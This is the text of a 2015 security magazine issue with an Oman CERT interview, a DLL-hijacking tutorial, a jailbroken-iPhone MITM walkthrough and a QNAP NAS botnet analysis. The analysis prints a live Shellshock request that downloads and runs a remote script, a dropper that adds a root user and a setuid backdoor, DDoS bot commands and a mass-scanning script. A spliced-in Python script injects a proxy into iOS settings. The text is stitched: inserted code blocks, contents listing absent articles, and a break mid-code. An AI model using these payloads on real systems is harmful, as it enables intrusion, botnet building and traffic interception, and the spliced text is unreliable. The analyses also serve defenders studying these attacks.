Security Kaizen Magazine, Issue 18
Vol.5 Issue 18 Jan. - Feb. 2015

The Best Is Yet To Come
Cairo Security Camp 2014: 5 years of Success
Interview with Badar Ali Al Salehi, General Director at OMAN National CERT

www.bluekaizen.org


Regional Cyber Security Summit 2015
Towards the Future of Cyber Attacks
Muscat, Oman, Al Bustan Palace
March 29-30, 2015

Confirmed Speakers
Eng. Badar Al Salehi, Director General, Oman National CERT, Head of ITU Regional Cyber Security Center
Maarten Van Horenbeeck, President at FIRST
Omar Sherin, Head of CIIP-Qcert
Georgia Weidman, Bulb Security LLC - Founder


Issue 18 | www.bluekaizen.org | 2



Contents

Interviews
5 Interview with Mr. Badar Ali Al Salehi, General Director – OMAN National CERT, Information Technology Authority - ITA

Grey Hat
7 DLL Hijacking
10 Attacking Jailbroken iDevices
13 NAS Botnet Revealed

New & News
16 Bluekaizen News
19 Regional Cyber Security Summit 2015
20 Cairo Security Camp 2014

Reviews
24 Malware Review: AndroidOS_GEINIMI analysis report
28 Malware Review: Win32:DarkSeoul-C, Trojan.Win32.EraseMBR.b
31 Code Review: Manual Source Code Review

Best Practice
37 Defining a Proactive Security Monitoring Strategy
39 Information Security Is a Challenge in The Middle East



Editor’s Note

It is customary with each New Year that everyone sets his plans and his resolutions with the mere hope of improvement, or better yet a new beginning. Usually we are filled with positive feelings and an inner boost that keeps us going till the year's end. I will try this year to enter with a more enthusiastic (though it will be hard) approach; I will try not to set the bar real high this time, and for this I have to thank everyone who helped me with their words and encouragement, everyone I see fighting and still standing in his area, young geeks with their never-ending ideas, and the list goes on... I guess what I am trying to say is, you should all take this as an opportunity to see new possibilities, to see the glass half full, to join a group of positive people and not let the negative vibes get you. This March, Bluekaizen is contributing to organizing the Regional Cyber Security Summit in OMAN with the help of OMAN CERT. On a different note, I want to congratulate Ahmed Mohamed for the Hack Zone project and hope you can all support him to let his dream come to life. Those kinds of initiatives are what keep the positive energy in us.

Also, we are now preparing for the interviews of Bluekaizen Chapters, so if you are interested please fill out the form that should have been published on the Bluekaizen Facebook page. This year we are planning to establish more solid and organized chapters with clear duties and responsibilities, so that we can reach as many people as we can. #spreadtheword #Bluekaizenchapters2015

Magazine Team
Chairman & Editor-in-Chief: Moataz Salah
Editor: Mohamed H. Abdel Akher
Contributors: BK team, Khaled Sakr, Nipun Jaswal, Senad Aruc, Ehab Abdel Monem, Abdulrahman Hesham, Shaikh Rashid, Harris D. Schwartz, Abdul Rehman
Website Development: Mariam Samy
Marketing Coordinator: Mahitab Ahmed
Distribution: Ahmed Mohamed
Design: Mohamed A. El-Maghraby

Security Kaizen is issued bi-monthly. Reproduction in whole or in part without written permission is strictly prohibited. ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG. For advertisement in Security Kaizen Magazine and on the www.bluekaizen.org website, e-mail info@bluekaizen.org or phone: +2 0100 267 5570, +971 5695 40127

Bluekaizen Founder



Interviews

Interview with Mr. Badar Ali Al Salehi, General Director – OMAN National CERT, Information Technology Authority - ITA

Can you please introduce yourself to Security Kaizen magazine readers (bio, experience)?

My name is Badar Al-Salehi. I am the General Director of Oman National CERT, which is the e-Oman national initiative aiming at addressing cyber security risks, developing local cyber security capabilities within the Sultanate of Oman, building a cyber security awareness program for public and private sector organizations, and securing critical national infrastructure and key industries as well as the general public and ICT users.

BK Team


I joined ITA at the early establishment of this Authority in 2006, and since then I have been working on different national information security and critical infrastructure related projects. I am also a member of different regional and international forums and committees, including the GCC CERT and OIC-CERT steering committees, and I am the Oman CERT representative to the Forum of Incident Response and Security Teams (FIRST). I am an advisory board member at the College of Modern Science and a member of the Ministry of Manpower committee reviewing the IT curriculum. I have been speaking and panelling at several regional and international ICT and cyber security forums, summits and conferences. Before joining ITA, I played different senior roles at Sultan Qaboos University and the Municipality of Muscat, looking after the critical infrastructures and systems as well as information security, where I worked on the first initiative in Oman to establish an information security management system within the government.


What is the main role of Oman CERT?

OCERT's mission is developing cybersecurity capabilities to increase the capacity for security incident detection and emergency response to such incidents, and also to ensure cyber-security awareness in public and private sector organizations, including citizens and residents.

What is the Regional Cyber Security Center? How was it established? And what is its vision and mission?

Towards achieving its goal of a safe cyberspace across the globe, the ITU Arab Regional Cyber Security Center (ITU-ARCC) was established by the International Telecommunication Union (ITU) and the Omani Government, represented by the Information Technology Authority, through its collaboration with the International Multilateral Partnership Against Cyber Threats (IMPACT), with a vision of creating a safer and cooperative cybersecurity environment in the Arab region and strengthening the role of ITU in building confidence and security in the use of information and communication technologies in the region. In line with the objectives of the ITU Global Cybersecurity Agenda (GCA) and the ITU-IMPACT initiative, ITU-ARCC acts as ITU's cybersecurity hub in the region, localizing and coordinating cybersecurity initiatives. ITU-ARCC is hosted, managed and operated by Oman National CERT (OCERT). The Centre is designed to cater for the cybersecurity needs of the Arab region. The Centre was officially launched on the 3rd of March 2013 at the Oman National CERT in Muscat.

What are the main services provided by ARCC?

ITU-ARCC offers a variety of cybersecurity services to meet the difficult challenges of fighting cyber threats and to support the center's aim. These services align with the ITU Global Cybersecurity Agenda (GCA), which intends to enhance confidence and security in the information society. The GCA was launched on 17th May 2007 for international cooperation and strategies to improve the global cybersecurity posture. ITU-ARCC provides the following services:
•Cybersecurity Strategy and Governance
•Cybersecurity Assurance & Compliance
•Cybersecurity Capacity Building
•Emergency Incident Response
•Technical Services and Information Sharing: full collaboration and sharing information against cyber

Can you give us more information about the Regional Cyber Security Summit 2015?

The Information Technology Authority, represented by Oman National CERT (OCERT), is hosting the Regional Cyber Security Summit, in cooperation with the International Telecommunication Union (ITU), IMPACT and Bluekaizen, on the 29th - 30th of March in Muscat, Oman. The Regional Cyber Security Summit in 2015 focuses on future expected threats and measures, and also aims at connecting the public, private and academic sectors, with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss and formulate strategic directions and plans to tackle emerging threats to the global and regional security sector. The conference targets the different CERTs in the Arab region, Chief Security Officers and strategic positions in different organizations, either from Oman or from other Arab countries. Security professionals from all over the world are welcome to submit their talks before the 20th of February if they are interested in presenting at the fourth edition of RCSS. For more information you can check the summit website: www.regionalcybersecuritysummit.com

What do you think is the greatest achievement for ARCC in 2014?

In the next years ITU-ARCC will focus on designing and implementing national cybersecurity strategies for Arab countries to achieve significant improvement in their security posture. In addition, ITU-ARCC will conduct and implement cybersecurity measures in the region.

What are your wishes for the Arab region in the information security field?

The main purpose of ITU-ARCC is to support the member states of the Arab region in developing and improving cybersecurity through the development of sound cybersecurity policies and capabilities, building human capacity, and developing related tools, applications, templates, procedures and manuals. ITU-ARCC wishes to unite and strengthen cybersecurity initiatives and programs to improve the cybersecurity posture in the Arab region against cyber threats through regional cooperation.



Grey Hat

DLL Hijacking

Introduction
In this article I would like to discuss the DLL Hijacking attack, because of its impact and ease of exploitation. The article goes through the concept of DLL Hijacking, then how to exploit systems using DLL hijacking in simple steps, and finally a demo of exploiting a vulnerable program.

DLL & DLL Hijacking
Let's first understand what a DLL is and what it is used for. DLL is an abbreviation for Dynamic Link Library. DLLs are libraries that contain shared functions used by executable files at runtime. As an example, take an application that displays a MessageBox that says "Simple MessageBox": what actually happens inside this application is that it loads a built-in DLL called "User32.dll" and executes a function inside it called MessageBoxA (e.g. MessageBoxA(0, "Simple MessageBOX", "", MB_OK); see Figure below).

Khaled Sakr

Information Security Engineer at Security Meter


The flow the application takes to load a DLL at runtime is: first Windows tries to locate the DLL; to do this it searches a well-defined set of directories in a particular order, as described in the DLL Search Order. Based on that logic, if an attacker gains control of one of the directories on the DLL search path, he can place a malicious copy of the DLL in that directory. This is called DLL Hijacking: if the application does not find the legitimate DLL before searching the compromised directory, it loads the malicious DLL. In this way DLL Hijacking can be used for remote code execution (the classic remote case is a file opened from a network share, whose directory becomes the current directory that is searched), or even privilege escalation if the vulnerable program runs as administrator.

DLL Hijacking in a few steps

So what are the steps to perform a successful DLL hijacking attack?
1. Target a certain application.
2. Monitor the DLLs that are loaded by this application.
3. Find the search order for those DLLs.
4. Target a DLL where you can put your malicious DLL so that it is found before the legitimate one, or better, target a DLL that is not available at all, for example VulnDLL.dll.
5. Find out which function the application calls from this DLL, for example executeme().
6. Write the code you want executed when the DLL loads and put it inside a function executeme(); the function must be exported under exactly that name, otherwise the loader fails to resolve the import and the process does not start.
7. Compile the code to a shared library matching the target's architecture (a 32-bit process cannot load a 64-bit DLL) and name it VulnDLL.dll.

Let's Crack Some Systems

In this part I'll show a demo of how to perform a successful DLL Hijacking attack. In this demo we target the tftp32.exe application. You can find a list of applications reported to be vulnerable to DLL Hijacking at the following link: http://www.exploit-db.com/dllhijacking-vulnerable-applications/

So let's start the fun part! As discussed, we need the list of DLLs that get loaded at runtime when the application starts. This can be achieved easily using the Procmon.exe tool: start your application and add the following filters in Procmon:
•Process Name is tftp32.exe
•Path ends with DLL
These filters give us all entries related to the process tftp32.exe and all the DLL files it is trying to load. Now let's target a DLL. We can notice in the Result column in Procmon that some entries state "NAME NOT FOUND", which means that the system tried to load the DLL from that path but could not find it; these are the perfect DLLs to target. So let's add another filter:
•Result contains NAME NOT FOUND
Great, now we have a smaller list of targets to choose from. Any one of these DLLs can be vulnerable to DLL Hijacking, so let's pick one, for example "IPHLPAPI.DLL".

As discussed, the application loads the DLL to execute a function that exists inside it, so the next step is to figure out which function inside this DLL the application needs. With a little bit of reversing using IDA we can obtain this information. I was able to get the function name using static reversing only; in other cases you will need to reverse the application at runtime to obtain the function name. Now let's start reversing. In the case of this application it is very trivial: just load the application in IDA.
•Open the "Strings" subview and search for the target DLL, IPHLPAPI.DLL (see Figure below).
•Double-click on it and IDA gives you the reference to where it is used in the assembly code (see Figure below).

We can see that a string was defined with the value "IPHLPAPI.DLL" (db 'IPHLPAPI.DLL'), and we can see where this string is used in the code if we double-click on DATA XREF: .rdata:004283EC (see Figure below).

At the address where the target DLL is referenced we find that the application imports a function called SendARP(). We don't need to know what this function does; we only need to know its name.

So, as you have all guessed by now, the only steps remaining are:
•Write the code we want executed when the vulnerable application runs,
•Insert this code inside an exported function called SendARP(),
•Compile this code into a shared library (DLL) and call it "IPHLPAPI.DLL",
•Put it in a path where the system looks for it, and we get ourselves a backdoor or remote code execution on the system.
Just to demonstrate, I will write code that opens a MessageBox displaying "DLL Hijacked" to the user; the code snippet is shown below.

A simple explanation of the code: when the DLL is attached to the process (DLL_PROCESS_ATTACH), it executes the SendARP() function. So each time the program runs, this function gets executed. Instead of just opening a MessageBox you can use this vulnerability to make the victim reverse-connect to you and get a permanent shell or backdoor on the box, or even better, a Meterpreter session if you insert the right code inside the SendARP() function.

Summary

So now we know how to exploit DLL hijacking vulnerabilities; what about remediating them? In a few points, here are some recommended solutions.

From a development perspective:
1. Always use a fully specified path name in the LoadLibrary() or LoadLibraryEx() calls; on systems with KB2533623 (Windows 7 and later) LoadLibraryEx can also be called with LOAD_LIBRARY_SEARCH_SYSTEM32, or SetDefaultDllDirectories can restrict the search for the whole process.
2. Consider removing the current directory from the standard search path by calling SetDllDirectory with an empty string ("").

From a system hardening perspective:
3. Make sure the registry value SafeDllSearchMode is set to 1 (the default since Windows XP SP2); this places the user's current directory after the system directories in the search order (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode). DLLs listed under KnownDLLs in the same key are always taken from the system directory, so a name on that list cannot be hijacked through the search path at all.

As a matter of fact, the above is not a complete solution, because Windows has a feature called DLL redirection ("DotLocal"): if an application is named abc.exe and a file or folder named "abc.exe.local" is created next to it, the loader looks for the DLLs the application needs in its own directory (or in that folder) first, even when the DLL was requested with a full path through LoadLibraryEx("Path to DLL"). So, if you think about it, this can make applications vulnerable to DLL hijacking even after the fixes above. Two caveats: creating the .local entry requires write access to the application's directory, and redirection is ignored for applications that carry a manifest unless the DevOverrideEnable registry value is set.
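The triage part of the procedure above, as an added example that is not from the article or from the Procmon tool: a Python script that reads a Procmon CSV export and lists, for one process, the DLLs whose load attempts returned NAME NOT FOUND, plus a model of the standard search order with SafeDllSearchMode on or off, so the probed directories can be checked against the ones an attacker could write to. The CSV rows, the application directory C:\Tools\tftpd32 and the "writable" directories are constructed for the example.

```python
"""Triage for the DLL-hijacking procedure above.

Added example, not the author's code or the Procmon tool itself. It (1) parses a
Procmon CSV export and lists the DLLs a process tried to load from paths that
returned NAME NOT FOUND, and (2) models the standard DLL search order with
SafeDllSearchMode on or off, so the probed paths can be compared against the
directories an attacker can write to.
"""
import csv
import io
import ntpath
from collections import OrderedDict

# Constructed Procmon export (File > Save, CSV). Process, PID and paths are
# illustrative, not taken from the article's capture of tftp32.exe.
SAMPLE_CSV = '''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0000","tftp32.exe","1234","CreateFile","C:\\Tools\\tftpd32\\IPHLPAPI.DLL","NAME NOT FOUND","Desired Access: Read Data"
"10:00:01.0001","tftp32.exe","1234","CreateFile","C:\\Windows\\System32\\IPHLPAPI.DLL","SUCCESS","Desired Access: Read Data"
"10:00:01.0002","tftp32.exe","1234","CreateFile","C:\\Tools\\tftpd32\\VulnDLL.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:00:01.0003","tftp32.exe","1234","CreateFile","C:\\Windows\\System32\\VulnDLL.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:00:01.0004","tftp32.exe","1234","CreateFile","C:\\Windows\\VulnDLL.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:00:01.0005","tftp32.exe","1234","CreateFile","C:\\Users\\victim\\Downloads\\VulnDLL.dll","NAME NOT FOUND","Desired Access: Read Data"
"10:00:01.0006","explorer.exe","4","CreateFile","C:\\Windows\\System32\\shell32.dll","SUCCESS","Desired Access: Read Data"
'''


def missing_dll_probes(csv_text, process_name):
    """Group NAME NOT FOUND probes of *.dll files by DLL name, in capture order.

    Returns (probes, found): probes maps lower-cased DLL name -> paths that were
    tried and did not exist; found is the set of DLL names that were eventually
    loaded (SUCCESS). A DLL in both can be hijacked from any path probed before
    the real one; a DLL only in probes does not exist at all and can be planted
    in any probed directory."""
    probes = OrderedDict()
    found = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        name = ntpath.basename(path).lower()
        if row["Result"] == "NAME NOT FOUND":
            probes.setdefault(name, []).append(path)
        elif row["Result"] == "SUCCESS":
            found.add(name)
    return probes, found


def standard_search_order(app_dir, system_dir, windows_dir, cwd, path_dirs,
                          safe_dll_search_mode=True):
    """Directories the loader probes for a DLL given by name only, in order.

    SafeDllSearchMode=1 (default since Windows XP SP2) searches the current
    directory after the system directories; with 0 it is searched right after
    the application directory, which is the classic hijack position."""
    system_dirs = [system_dir, ntpath.join(windows_dir, "System"), windows_dir]
    if safe_dll_search_mode:
        order = [app_dir] + system_dirs + [cwd]
    else:
        order = [app_dir, cwd] + system_dirs
    return order + list(path_dirs)


def hijack_candidates(order, legit_dir, writable_dirs):
    """Writable directories searched before the legitimate copy of the DLL.

    legit_dir=None means the DLL does not exist anywhere, so every writable
    directory in the search order is a candidate."""
    def norm(p):
        return ntpath.normcase(ntpath.normpath(p))
    writable = {norm(d) for d in writable_dirs}
    out = []
    for d in order:
        if legit_dir is not None and norm(d) == norm(legit_dir):
            break
        if norm(d) in writable:
            out.append(d)
    return out


if __name__ == "__main__":
    probes, found = missing_dll_probes(SAMPLE_CSV, "tftp32.exe")
    for dll, paths in probes.items():
        status = "exists elsewhere" if dll in found else "does not exist"
        print(f"{dll} ({status}):")
        for p in paths:
            print("   probed", p)
    order = standard_search_order(r"C:\Tools\tftpd32", r"C:\Windows\System32",
                                  r"C:\Windows", r"C:\Users\victim\Downloads",
                                  [r"C:\Python27"], safe_dll_search_mode=False)
    print("hijackable from:", hijack_candidates(order, r"C:\Windows\System32",
                                                [r"C:\Users\victim\Downloads"]))
```

In the sample, IPHLPAPI.DLL is probed in the application directory before being found in System32, so it is only hijackable by someone who can write next to the executable; VulnDLL.dll is never found, so with SafeDllSearchMode off the current directory (a Downloads folder here) is enough.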



Grey Hat

Attacking Jailbroken iDevices

Introduction
Apple iDevices are continually jailbroken in order to expand their capabilities. However, most people do not know the consequences that come with it. Hackers and security enthusiasts can easily breach a jailbroken device and remotely install a malicious proxy configuration on the victim's device. Today we will discuss the procedure hackers use to carry out this attack on a target device, and we will look at the fix for the same.

Nipun Jaswal

Chief Cyber Security Architect


Requirements
To carry out this attack efficiently, an attacker needs the following tools:
- Burp Suite (for certificate generation)
- WinSCP client (copying and downloading files from the remote device)
- Hydra (brute force for SSH)
- PList Editor (editing plist files)
- PuTTY (terminal for the remote device)

Procedure
Most people who own jailbroken iDevices do not know about the open SSH port on the device. This makes them vulnerable to a known-password attack, because in most cases the root password is still the default 'alpine'. If the user is a little techy and has changed the default password, Hydra, a brute force tool, can help you find the correct password of the device. After logging in through SSH using PuTTY, we can fetch the preferences file of the device located at the following path:
/private/var/preferences/SystemConfiguration/preferences.plist
Using the WinSCP client, we download the above file to our system and view its contents using the PList Editor software.

Figure 1 No Proxy Details

We can see that we have:
•HTTPEnable=0
•HTTPProxyType=0
•HTTPSEnable=0
If we alter these three values, we set the proxy configuration on the device without touching its user interface. HTTPProxyType selects how the proxy is applied: 1 uses the manually entered proxy details (host and port), 2 selects automatic proxy configuration. Let us modify this configuration file.

Figure 2 Proxy Configuration

Altering the above values results in the following proxy configuration on the device:

Figure 3 Automatic Proxy Configuration

Hence, we can see the proxy details showing up in the manual configuration of the device.

Installing the cert on the device
Wait: to read the HTTPS/SSL traffic of applications like Twitter, Gmail and Facebook, we need to install our root CA certificate on the device as well. The certificate details are stored at the following path:
/private/var/mobile/Library/ConfigurationProfiles
Let us see what files this directory contains before the certificate installation.

Figure 4 Device before Certificate Install

In addition, the interface does not contain any option for profiles before one is installed.

Figure 5 Device Properties Before Cert Install

Now what we can do easily is install the Burp Suite CA certificate on our own iDevice the usual way and copy its files to the target device. We need four files from /private/var/mobile/Library/ConfigurationProfiles:
•Cert
•PayloadDependency.plist
•PayloadManifest.plist
•ProfileTruth.plist
Let us copy these files from our device over the target's, as follows.

Figure 6 Device After Copying Cert Files

Next, we respring the device and check whether the certificate is installed.

Figure 7 Device properties after Cert Install

We can see that the profile is now part of the General settings of the device. Hence, we configured an MITM proxy and installed the certificate remotely. Therefore, we can easily capture the device's SSL traffic and analyze it for vital pieces of information. The fix follows from the attack: change the default root and mobile passwords right after jailbreaking (passwd as root, then passwd mobile) and do not leave OpenSSH listening when it is not needed.

References
http://hackertarget.com/brute-forcing-passwords-with-ncrack-hydra-and-medusa/
http://www.putty.org
http://winscp.net/eng/download.php
http://plist-editor-for-windows.software.informer.com/
http://portswigger.net/Burp/help/proxy_options_installingCAcert.html
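The plist edit described above, as an added example that is not the author's code: Python's plistlib performs the same change a GUI plist editor would, setting HTTPEnable, HTTPSEnable and HTTPProxyType together with the proxy host and port (HTTPProxy, HTTPPort, HTTPSProxy, HTTPSPort, the standard SystemConfiguration proxy keys) for every network service in the file, and a second function lists the enabled proxies so a defender can spot one that should not be there. The plist content, the service UUID and the proxy address are constructed for the example.

```python
"""Proxy injection into an iOS SystemConfiguration preferences.plist.

Added example, not the article's own code or tooling: it performs the plist edit
described above with Python's plistlib instead of a GUI PList editor, and adds
the defender's check (which proxies are enabled, and are they expected?).
"""
import plistlib

# Constructed stand-in for /private/var/preferences/SystemConfiguration/preferences.plist.
# Only the NetworkServices/<UUID>/Proxies subtree the article edits is modelled;
# the service UUID and interface name are made up.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>NetworkServices</key>
  <dict>
    <key>11111111-2222-3333-4444-555555555555</key>
    <dict>
      <key>Interface</key>
      <dict><key>DeviceName</key><string>en0</string></dict>
      <key>Proxies</key>
      <dict>
        <key>HTTPEnable</key><integer>0</integer>
        <key>HTTPProxyType</key><integer>0</integer>
        <key>HTTPSEnable</key><integer>0</integer>
      </dict>
    </dict>
  </dict>
</dict>
</plist>
"""

MANUAL_PROXY = 1  # HTTPProxyType value for a manually configured proxy


def set_manual_proxy(plist_bytes, host, port):
    """Return the plist with every network service sending HTTP and HTTPS through host:port."""
    prefs = plistlib.loads(plist_bytes)
    for service in prefs.get("NetworkServices", {}).values():
        proxies = service.setdefault("Proxies", {})
        proxies.update({
            "HTTPEnable": 1, "HTTPProxy": host, "HTTPPort": port,
            "HTTPSEnable": 1, "HTTPSProxy": host, "HTTPSPort": port,
            "HTTPProxyType": MANUAL_PROXY,
        })
    return plistlib.dumps(prefs)


def configured_proxies(plist_bytes):
    """(service_id, scheme, host, port) for every enabled proxy: the defender's view."""
    prefs = plistlib.loads(plist_bytes)
    found = []
    for sid, service in prefs.get("NetworkServices", {}).items():
        p = service.get("Proxies", {})
        for scheme in ("HTTP", "HTTPS"):
            if p.get(scheme + "Enable") == 1:
                found.append((sid, scheme, p.get(scheme + "Proxy"), p.get(scheme + "Port")))
    return found


def proxy_types(plist_bytes):
    """HTTPProxyType per service id, to confirm the edit took effect."""
    prefs = plistlib.loads(plist_bytes)
    return {sid: s.get("Proxies", {}).get("HTTPProxyType")
            for sid, s in prefs.get("NetworkServices", {}).items()}


def unexpected_proxies(plist_bytes, allowed_hosts=()):
    """Enabled proxies whose host is not on the allow-list (e.g. the corporate proxy)."""
    return [e for e in configured_proxies(plist_bytes) if e[2] not in allowed_hosts]


if __name__ == "__main__":
    tampered = set_manual_proxy(SAMPLE_PLIST, "10.0.0.5", 8080)
    for entry in unexpected_proxies(tampered, allowed_hosts=("proxy.corp.example",)):
        print("unexpected proxy:", entry)
```

The same script, pointed at a plist pulled off a device over SSH, is a quick integrity check after a jailbreak: anything listed by unexpected_proxies that the owner did not configure is the attack described above.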




Grey Hat

NAS Botnet Revealed

Senad Aruc
Senior Lead at Security Operations

About the security researcher
Multiple-certified ISMS professional with a 10-year background in IT security: IDS and IPS, SIEM, SOC, network forensics, malware analysis, ISMS and risk, ethical hacking, vulnerability management, anti-fraud and cyber security. Skills include written and verbal communication in 6 different languages. Currently holding a Senior Security Specialist position at Reply S.p.A. - Communication Valley - Security Operations Center, responsible for advanced security operations.

We present our findings in addition to the work in the following analyses:
Worm Backdoors and Secures QNAP Network Storage Devices
https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
Shellshock Worm Exploiting Unpatched QNAP NAS Devices
https://threatpost.com/shellshock-worm-exploiting-unpatched-qnap-nas-devices/109870
A little ShellShock fun
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html


This is what we found: the missing pieces from previous research.

The attackers send a GET request carrying the Shellshock exploit to IP ranges across the whole Internet. Successfully hacked NAS devices are forced to download a payload from the Internet; this payload is an SH script with very cleverly designed logic, built specifically for QNAP NAS devices. The payload downloads an ELF Linux installer package with bot functionality for DDoS. From this point the attacker builds persistence with an autorun.sh script inside the compromised NAS device. Another interesting finding is that the attacker patches the vulnerable device against the Shellshock vulnerability (the script fetches QNAP's own ShellshockFix package); by doing this the attacker prevents other hackers from owning the already hacked NAS device. Adding a "request" user with root privileges (UID 0) to the "passwd" and "shadow" files is the classical approach to owning a Linux machine. The real aim of this massive hack is the "armgH.cgi" binary that the attacker downloads and installs on the compromised machine: this CGI backdoor prepares the NAS to become an armed device ready for DDoS. The whole attack chain is designed to be continuous, in autopilot mode. So far we have detected more than 500 compromised devices.

Massive Attack > Deploying Payload > Patching against Shellshock (persistence) > Arming > Deploying the scanner > ...

Details

Attack exploit detected by our IDS devices:

GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=utf-8
Content-Length: 2250
Date: Sat, 13 Dec 2014 22:09:42 GMT
Server:
HTTP Status 404 - /cgi-bin/authLogin.cgi

Payload, hosted on a compromised server (excerpt):

#!/bin/sh
export PATH=/opt/sbin:/opt/bin:/usr/local/bin:/bin:/usr/bin:/usr/sbin:/mnt/ext/usr/bin:/mnt/ext/usr/local/bin
unset HISTFIE ; unset REMOTEHOST ; unset SHISTORY ; unset BASHISTORY
os=`uname -m`
ip=xxx.14.xx.xx
#wget -P /tmp/ http://qupn.byethost5.com/gH/S0.sh ; cd /tmp/ ; chmod +x S0.sh ; sh S0.sh
#
#
fold=/share/MD0_DATA/optware/.xpl/
if [[ "$os" == 'armv5tel' ]]; then
wget -c -P /share/MD0_DATA/optware/.xpl/ http://$ip/armgH.cgi
chmod 4755 /home/httpd/cgi-bin/armgH.cgi
mv /home/httpd/cgi-bin/armgH.cgi /home/httpd/cgi-bin/exo.cgi
cp /home/httpd/cgi-bin/exo.cgi ${fold}.exo.cgi
sleep 1
Search="request"
Files="/etc/passwd"
if grep $Search $Files; then
echo "$Search user its just added!"
else
echo "request:x:0:0:request:/share/homes/admin:/bin/sh" >> /etc/passwd
echo 'request:$1$$PpwZ.r22sL5YrJ1ZQr58x0:15166:0:99999:7:::' >> /etc/shadow
#inst patch
wget -P /mnt/HDA_ROOT/update_pkg/ http://eu1.qnap.com/Storage/Qfix/ShellshockFix_1.0.2_20141008_all.bin
#inst scan
sfolder="/share/HDB_DATA/.../"
url69="http://xxx.14.xx.79/run"



Arming the NAS devices for DDoS attacks. Hosted on a compromised server: "armgH.cgi", an ELF Linux backdoor with IRC client and DDoS capability (installed with mode 4755, i.e. setuid root). Output from reverse-engineering analysis (the bot's help text):

PRIVMSG %s :* .exec <commands> - execute a system command
PRIVMSG %s :* .version - show the current version of bot
PRIVMSG %s :* .status - show the status of bot
PRIVMSG %s :* .help - show this help message
PRIVMSG %s :* *** Scan Commands
PRIVMSG %s :* .advscan <a> <b> <user> <passwd> - scan with user:pass (A.B) classes sets by you
PRIVMSG %s :* .advscan <a> <b> - scan with d-link config reset bug
PRIVMSG %s :* .advscan->recursive <user> <pass> - scan local ip range with user:pass, (C.D) classes random
PRIVMSG %s :* .advscan->recursive - scan local ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random <user> <pass> - scan random ip range with user:pass, (A.B) classes random
PRIVMSG %s :* .advscan->random - scan random ip range with d-link config reset bug
PRIVMSG %s :* .advscan->random->b <user> <pass> - scan local ip range with user:pass, A.(B) class random
PRIVMSG %s :* .advscan->random->b - scan local ip range with d-link config reset bug
PRIVMSG %s :* .stop - stop current operation (scan/dos)
PRIVMSG %s :* *** DDos Commands:
PRIVMSG %s :* NOTE: <port> to 0 = random ports, <ip> to 0 = random spoofing,
PRIVMSG %s :* use .*flood->[m,a,p,s,x] for selected ddos, example: .ngackflood->s host port secs
PRIVMSG %s :* where: *=syn,ngsyn,ack,ngack m=mipsel a=arm p=ppc s=superh x=x86
PRIVMSG %s :* .spoof <ip> - set the source address ip spoof
PRIVMSG %s :* .synflood <host> <port> <secs> - tcp syn flooder
PRIVMSG %s :* .ngsynflood <host> <port> <secs> - tcp ngsyn flooder (new generation)
PRIVMSG %s :* .ackflood <host> <port> <secs> - tcp ack flooder
PRIVMSG %s :* .ngackflood <host> <port> <secs> - tcp ngack flooder (new generation)
PRIVMSG %s :* *** IRC Commands:
PRIVMSG %s :* .setchan <channel> - set new master channel
PRIVMSG %s :* .join <channel> <password> - join bot in selected room
PRIVMSG %s :* .part <channel> - part bot from selected room
PRIVMSG %s :* .quit - kill the current process


Screenshot from a hacked NAS device: the deployed payload can be controlled through the CGI web backdoor at http://X.X.X.X:8080/cgi-bin/exo.cgi

Mass scanner for Shellshock

This script was taken from a compromised NAS device. The attacker uses "pnscan", a multi-threaded port scanner, to search for and hack other vulnerable QNAP NAS devices: it picks a random first octet, sends the same Shellshock request to every host in that /8 on port 8080, and runs in the background.

#!/bin/sh
## xXx@code 3-12-2014
rand=`echo $((RANDOM%255+2))`
#url=""
url="http://1xx.xx.xx.xx/S0.sh"
download="/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget -c $url -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1 \n\n\n"
get="GET /cgi-bin/authLogin.cgi HTTP/1.1\nHost: 127.0.0.1\nUser-Agent: () { :; }; $download \n\n\n"
./pnscan -rQDoc -w"$get "-t500 -n300 $rand.0.0.0:255.0.0.0 8080 > /dev/null &
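A detector for the request shown above, as an added example that is not the researcher's tooling: it flags any request in which a header value starts with the bash function-definition prefix that Shellshock abuses, then extracts the payload URL and the staging paths from the injected command so they can be blocked and hunted for. The requests are constructed; the worm request reproduces the captured one with the IP redacted as in the article.

```python
"""Shellshock (CVE-2014-6271) request detector with indicator extraction.

Added example, not the researcher's own tooling: it scans HTTP requests for the
bash function-definition prefix "() {" that the QNAP worm above smuggles in the
User-Agent header, then pulls the download URL and dropped-file paths out of the
injected command so they can be blocked and hunted for. All requests below are
constructed; the worm request mirrors the captured one with the IP redacted.
"""
import re

# Unpatched bash ran any environment variable whose value starts with "() {" as a
# function definition and executed what followed the closing "};". Matching the
# prefix and a closing "};" catches the stock ":;" body and padded bodies alike.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)", re.S)
URL_RE = re.compile(r"https?://[^\s'\"]+")
# Writable locations a NAS dropper typically stages files in (assumption for this example).
DROP_PATH_RE = re.compile(r"(?<![\w.])/(?:tmp|share|mnt|home)/[^\s&;|]+")

SAMPLE_RAW = (
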